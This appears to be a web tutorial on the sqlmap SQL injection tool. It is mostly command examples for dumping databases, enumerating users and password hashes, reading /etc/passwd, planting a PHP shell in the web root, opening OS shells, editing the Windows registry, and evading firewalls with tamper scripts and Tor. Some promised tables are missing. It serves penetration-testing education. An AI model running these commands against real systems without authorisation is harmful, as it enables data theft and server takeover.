SQLMAP Tutorial: A Comprehensive Guide

Learn how the SQLMap tool works and its significance in SQL injection testing and exploitation. Understand its capabilities, and techniques, and used them to enhance web application security through an automated vulnerability assessment.

What is SQLMAP?

In the realm of web application security, SQL injection remains a prevalent and severe vulnerability. As the sophistication of cyberattacks increases, it becomes crucial to identify and patch such vulnerabilities before malicious actors exploit them. This is where the SQLMap tool comes into play. SQLMap is a powerful open-source tool that automates the process of detecting and exploiting SQL injection vulnerabilities. In this article, we will delve into the inner workings of SQLMap, its techniques, and how it aids in ensuring robust web application security.

Understanding SQL Injection

Before diving into SQLMap, let’s briefly explore SQL injection. It is a technique used by attackers to manipulate SQL queries executed by a web application’s database backend.

By inserting malicious SQL code, attackers can bypass authentication mechanisms, extract sensitive data, modify databases, or even execute arbitrary commands on the underlying server.

To combat this threat, developers and security professionals perform SQL injection testing to identify and rectify potential vulnerabilities.

SQLMAP Features

SQLMAP is packed with features that make it a powerful tool for testing web application security. Some of its notable features include:

1. Automatic detection of SQL Injection vulnerabilities: SQLMAP uses various techniques to automatically detect SQL Injection vulnerabilities in web applications, such as error-based, blind, time-based, and boolean-based techniques.
2. Advanced exploitation techniques: SQLMAP provides advanced exploitation techniques, such as privilege escalation, database fingerprinting, and password cracking, to gain unauthorized access to the database.
3. Support for multiple databases: SQLMAP supports a wide range of databases, making it a versatile tool for testing different types of web applications.
4. Customizable testing options: SQLMAP allows testers to customize various testing options, such as the level of tests, delay between requests, and the type of injection technique to use.
5. Detailed reporting: SQLMAP generates detailed reports that provide information about the vulnerabilities discovered, the exploited data, and the overall testing results, making it easy to analyze the findings.

Now, let’s dive into some practical examples of using SQLMAP with various commands.

• B: Boolean-based blind
• E: Error-based
• U: Union query-based
• S: Stacked queries
• T: Time-based blind
• Q: Inline queries

Supported Databases

Basic SQL Injection test:

sqlmap -u https://example.com/login.php?username=test&password=test

This command tells SQLMAP to target the URL “https://example.com/login.php” with the parameters “username” and “password” and use the default technique to test for SQL Injection vulnerabilities.

Custom injection technique

sqlmap -u https://example.com/login.php?username=test&password=test --technique=U

This command specifies the “U” technique, which represents Union-based SQL Injection, to test for vulnerabilities in the “username” and “password” parameters of the URL.

Custom testing level and risk

sqlmap -u https://example.com/login.php?username=test&password=test --level=3 --risk=2

This command sets the testing level to 3 and the risk level to 2, which increases the thoroughness of the tests and the aggressiveness of the attacks.

Fetching database information

sqlmap -u https://example.com/login.php?username=test&password=test -D dbname --tables

This command tells SQLMAP to fetch the list of tables in the “dbname” database of the target URL.

Dumping data from a specific table

sqlmap -u https://example.com/login.php?username=test&password=test -D dbname -T tablename --dump

This command instructs SQLMAP to dump the data from the “tablename” table in the “dbname” database of the target URL.

Using a custom cookie

sqlmap -u https://example.com/login.php -C "PHPSESSID=1234567890abcdef

This command uses a custom cookie “PHPSESSID=1234567890abcdef” to authenticate with the target URL “https://example.com/login.php” and perform SQL Injection tests.

Using a custom User-Agent

sqlmap -u https://example.com/login.php --headers="User-Agent: customAgent"

This command sets a custom User-Agent “customAgent” in the request headers while testing for SQL Injection vulnerabilities in the target URL.

Saving the results to a report file

sqlmap -u https://example.com/login.php --batch --output-file=result.txt

This command runs SQLMAP in batch mode, saves the results to a report file “result.txt”, and suppresses interactive prompts.

Using a proxy

sqlmap -u https://example.com/login.php --proxy=http://proxy.example.com:8080

This command configures SQLMAP to use a proxy “http://proxy.example.com:8080” for sending requests to the target URL.

Using a custom tamper script

sqlmap -u https://example.com/login.php --tamper=my_script.py

List of some commonly used SQLMap TAMPER scripts, along with their descriptions and parameters:

These tamper scripts can be used with the --tamper=<tamper_script> parameter in SQLMap to apply specific tampering techniques during the scanning process. Each script modifies the payloads generated by SQLMap to bypass various input filters, evade WAF rules, and increase the chances of successful SQL injection exploitation.

SqlMap – target options

 Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -d DIRECT           Connection string for direct database connection
    -l LOGFILE          Parse target(s) from Burp or WebScarab proxy log file
    -m BULKFILE         Scan multiple targets given in a textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target URLs
    -c CONFIGFILE       Load options from a configuration INI file

 sqlmap -r req.txt -p namePeople

--current-user      Retrieve DBMS current user
--current-db        Retrieve DBMS current database
--hostname          Retrieve DBMS server hostname
--is-dba            Detect if the DBMS current user is DBA
--users             Enumerate DBMS users
--passwords         Enumerate DBMS users password hashes
--privileges        Enumerate DBMS users privileges

sqlmap -r req.txt -p namePeople --all

sqlmap -r req.txt -p namePeople --banner

sqlmap -r req.txt -p namePeople --dbs

sqlmap -r req.txt -p namePeople --current-user

sqlmap -r req.txt -p namePeople --roles

sqlmap -r req.txt -p namePeople --users

sqlmap -r req.txt -p namePeople --hostname

sqlmap -r req.txt -p namePeople --privileges

File system access

These options can be used to access the back-end database management
system underlying file system

--file-read=FILE..  Read a file from the back-end DBMS file system
--file-write=FIL..  Write a local file on the back-end DBMS file system
--file-dest=FILE..  Back-end DBMS absolute filepath to write to

sqlmap -r req.txt -p namePeople <strong>--file-read</strong>=/etc/passwd --batch

sqlmap -r req.txt -p namePeople --file-write=/home/user/rshell.php --file-dest=/var/www/html --batch

Operating system access

  These options can be used to access the back-end database management
  system underlying operating system

  --os-cmd=OSCMD      Execute an operating system command
  --os-shell          Prompt for an interactive operating system shell
  --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
  --os-smbrelay       One click prompt for an OOB shell, Meterpreter or VNC
  --os-bof            Stored procedure buffer overflow exploitation
  --priv-esc          Database process user privilege escalation
  --msf-path=MSFPATH  Local path where Metasploit Framework is installed
  --tmp-path=TMPPATH  Remote absolute path of temporary files directory

sqlmap -r req.txt -p namePeople --os-cmd=ifconfig
sqlmap -r req.txt -p namePeople --os-shell

Windows Registry Access

These options can be used to access the back-end database management system Windows registry
    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

Proxy Use

    --proxy=PROXY       Use a proxy to connect to the target URL
    --proxy-cred=PRO..  Proxy authentication credentials (name:password)
    --proxy-file=PRO..  Load proxy list from a file
    --proxy-freq=PRO..  Requests between change of proxy from a given list
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))
    --check-tor         Check to see if Tor is used properly

sqlmap --proxy="http://<proxy-ip>:<proxy-port>"
sqlmap --proxy="http://<proxy-ip>:<proxy-port>" --proxy-cred=username:password
sqlmap --tor --tor-port=9050 --tor-type=SOCKS5 -r req.txt --dbs
sqlmap --check-tor
sqlmap -r req.txt -p namePeople

SQLMap firewall filters

Here’s a table that lists some commonly used SQLMap firewall filters, along with their descriptions and parameters:

These firewall filters and parameters help SQLMap evade different types of web application firewalls and bypass their security measures.

It’s important to note that the usage of these filters should always adhere to ethical guidelines and be within the context of authorized security assessments.

Tamper Scripts

By using these commands and customizing SQLMAP settings, you can detect and exploit SQL injection vulnerabilities in web applications.

Remember, always use penetration testing tools ethically and with permission, and never use them to harm or exploit others.

SQLmap Project

Brute Force Database Services

RFS (104)